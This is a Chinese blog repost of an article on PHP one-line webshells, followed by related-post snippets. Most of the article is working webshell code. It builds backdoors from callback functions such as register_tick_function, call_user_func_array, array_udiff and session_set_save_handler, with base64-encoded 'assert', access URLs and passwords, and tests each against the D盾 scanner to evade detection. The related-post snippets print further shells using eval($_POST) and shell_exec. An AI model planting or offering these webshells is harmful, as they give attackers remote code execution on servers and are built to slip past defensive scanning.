php7 一句话木马,PHP一句话木马研究

最新推荐文章于 2024-04-17 06:30:00 发布
最新推荐文章于 2024-04-17 06:30:00 发布
阅读量764 收藏
点赞数
文章标签: php7 一句话木马

*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载

最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。

现总结如下:

方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。

已被D盾查杀的函数:array_filter()

array_walk()

array_walk_recursive()

array_map()

registregister_shutdown_function();

filter_var()

filter_var_array()

uasort()

uksort()

array_reduce() 可疑(级别2)

array_walk()

array_walk_recursive()

1.register_tick_function()

构造一句话:<?php

declare(ticks=1);

register_tick_function(base64_decode($_REQUEST['e']),$_REQUEST['a']);

?>

访问URL:IP/XXX.php?e=YXNzZXJ0

密码:a

2.变种call_user_func_array()

尝试模仿正常函数调用,定义一个简单的function:<?php

function newsSearch($para0){

$evil=$para0;

$exec=$_GET['id'];

call_user_func_array($exec,array($evil));

}

newsSearch($_POST['tid']);

?>

使用D盾查杀。

call_user_func_D%E7%9B%BE.png0ops!!没过!!变量$exec被解析成了$GET["id"],但$evil没有被解析,猜测只要将$exec放在newSearch()函数外面用GET方法获取,就不会被D盾解析,编写新的shell:<?php

function newsSearch($para0,$para1){

$evil=$para0;

call_user_func_array($para1,array($evil));

}

$exec=base64_decode($_GET['id']);

newsSearch($_POST['tid'],$exec);

?>

2.pngOK!完美绕过!

访问URL:IP/XXX.php?id=YXNzZXJ0

密码:key

同样的方法可以使用call_user_func函数,构造shell如下:<?php

function newsSearch($para0,$para1){

$evil=$para0;

call_user_func($para1,$evil);

}

$exec=base64_decode($_GET['id']);

newsSearch($_POST['tid'],$exec);

?>

3.变种array_udiff()

用相同的方法构造使用array_udiff()的shell:<?php

function newsSearch($para0,$para1){

$evil=$para0;

$exec=$para1;

array_udiff($arr=array($evil),$arr1 = array(''),$exec);

}

$exec=base64_decode($_REQUEST['exec']);

newsSearch($_POST['key'],$exec);

?>

访问URL:IP/XXX.php?exec=YXNzZXJ0

密码:key

剩下的回调函数也可以用相同的方法绕过D盾。

4.session_set_save_handlersession_set_save_handler函数可以定义用户级的session保存函数(打开、保存、关闭),当我们想把session保存在本地的一个数据库中时,本函数就很有用了。

编写shell如下:<?php

error_reporting(0);

$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert

function open($save_path, $session_name) // open第一个被调用,类似类的构造函数

{}

function close() // close最后一个被调用,类似 类的析构函数

{

}

session_id($_REQUEST['op']);// 执行session_id($_REQUEST['op'])后,PHP自动会进行read操作,因为我们为read callback赋值了assert操作,等价于执行assert($_REQUEST['op'])

function write($id, $sess_data)

{}

function destroy($id)

{}

function gc()

{}

// 第三个参数为read read(string $sessionId)

session_set_save_handler("open", "close", $session, "write", "destroy", "gc");

@session_start(); // 打开会话

?>

使用D盾查杀。

3.png$session被解析为assert,猜测D盾认为该函数的参数中不应该含有assert等敏感函数,否则就挂掉!把$session用GET输入试试:$session=$_REQUEST['id'];

4.png看来只要参数中含有敏感函数、GET、POST、REQUEST都会报错!

尝试创建一个用户函数,在函数中调用session_set_save_handler(),并将assert作为参数传入:<?php

error_reporting(0);

//$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert

function test($para){

session_set_save_handler("open", "close", $para, "write", "destroy", "gc");

@session_start(); // 打开会话

}

$session=base64_decode($_REQUEST['id']);

// open第一个被调用,类似类的构造函数

function open($save_path, $session_name)

{}

// close最后一个被调用,类似 类的析构函数

function close()

{

}

// 执行session_id($_REQUEST['op'])后,PHP自动会进行read操作,因为我们为read callback赋值了assert操作,等价于执行assert($_REQUEST['op'])

session_id($_REQUEST['op']);

function write($id, $sess_data)

{}

function destroy($id)

{}

function gc()

{}

// 第三个参数为read read(string $sessionId)

test($session);

?>

5.png完美绕过!

访问URL:IP/XXX.php?id=YXNzZXJ0

密码:op

*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载

Gonnch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 留言板 木马_PHP一句话木马研究
weixin_33365844的博客
03-09 392
*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array...
webshell之一句话木马变形
weixin_30371875的博客
05-05 1459
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COO...
[一句话] php 7.4.3 - 2020-2-20 发布
程序员写的技术 FAQ 和杂文
03-18 609
小版本修改。应该无主要功能更新。
PHP一句话木马
最新发布
Code-5的博客
04-17 834
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
一款过d盾PHP小马
shadowwolf’s blog
12-14 327
<?php $_='%99%88%8D%96%8B%9A'; $pass='a'; $rand_=rand(); $a=$_POST[$pass]; $file=md5('shadowwolf'); $shell='<?php '.$a.' ?>'; $myfile = fopen($file, "w"); (~urldecode($_))($myfile, $shell); include $file; 可以自己测测看啊
JavaScript 无法调用 close 方法
司马懿的西山居
10-12 1065
今天在写 websocket 的 demo 的时候,很随意的定义了 send 和 close 方法,来发送数据和关闭连接。大致代码如下 <html> <head> <script> function send() { console.log("send"); } function close() { console.log("close"); } </...
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
文件上传漏洞—蚁剑连接地址错误、一句话木马php语法错误
热门推荐
Xionghuimin的博客
06-02 2万+
题目 第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开 第二步:把写有 <? php phpinfo(); @eval($_POST['shell']); ?> 代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,蚁剑也连接不上。
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
PHP一句话木马是一种使用eval函数来执行恶意代码的木马,通常的代码形式为`<?php @eval($_POST['pass']);?>`。其中,eval函数将字符串按照PHP代码来计算,@符号用于停止报错,而pass是木马连接器的访问密码,通过...
PHP 木马攻击防御技巧
12-18
那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache /htdocs 这样,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误:...
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
PHP 木马攻击的防御设置方法
09-30
本文通过介绍一些技巧介绍了针对PHP木马攻击的防御之道,通过这些方面您能够更好的防范木马程式。
php 留言板 木马_说说那些强悍的PHP一句话后门木马
weixin_35130354的博客
03-09 265
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行...
菜刀连接PHP WebShell返回200错误
bloodzer0
06-17 6212
错误详情 WebShell内容: <?php @eval($_POST['cmd']); ?> 错误详情: 在Hackber或BurpSuite中却没有问题: 原因分析 PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d 如果把一句话Shell中的@符号去掉,会提示:Cannot call as
一句话木马
The__DeepSea的博客
03-19 700
什么叫一句话木马    就是一句简单的脚本语言,一句话木马分为php,asp,aspx等,      常见的有php一句话木马 &lt;?php@eval($_POST[value]));?&gt;      常见asp的一句话木马 &lt;%execute(request("value"))%&gt;      常见的aspx一句话木马  &lt;%@ Page Language="Jscri...
一句话木马连不上原因
c1042503039的博客
11-20 2991
一句话不要直接从从网上复制下来,别人写wp时可能用的中文,最好自己英文手打一遍。
Aspx 一句话木马和客户端(备用)
eldn__的专栏
04-18 1619
以下是引用片段: 这个一句话不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
PHP小马免杀的浅谈[过最新D盾]
shadowwolf’s blog
07-25 727
PHP小马免杀的浅谈[过最新D盾] 绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_content方法2 使用fwrite 绕过 主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行 方法1:File_put_content D盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴: <?php /* T00ls.net shadowwolf 2021-7-25 */ ( ~urldec
php一句话木马图片马
01-30
根据提供的引用内容,PHP一句话木马是一种利用PHP语言特性的恶意代码,它可以在服务器上执行命令并返回结果。而图片马是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句话木马中使用图片马的方法: ```php <?php $cmd = $_GET['cmd']; // 通过GET请求获取命令 // 执行命令并返回结果 $result = shell_exec($cmd); // 将结果输出到图片文件 header("Content-Type: image/jpeg"); imagejpeg($result); ?> ``` 在上述示例中,我们通过`$_GET['cmd']`获取用户传递的命令,并使用`shell_exec()`函数执行该命令。然后,我们将命令执行的结果作为图片文件输出,通过`imagejpeg()`函数将结果转换为JPEG格式的图片。 请注意,这只是一个示例,用于演示PHP一句话木马中使用图片马的原理。在实际应用中,使用这种方式进行攻击是违法的,并且严重侵犯了他人的隐私和安全。我强烈建议您遵守法律法规,并保护自己和他人的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值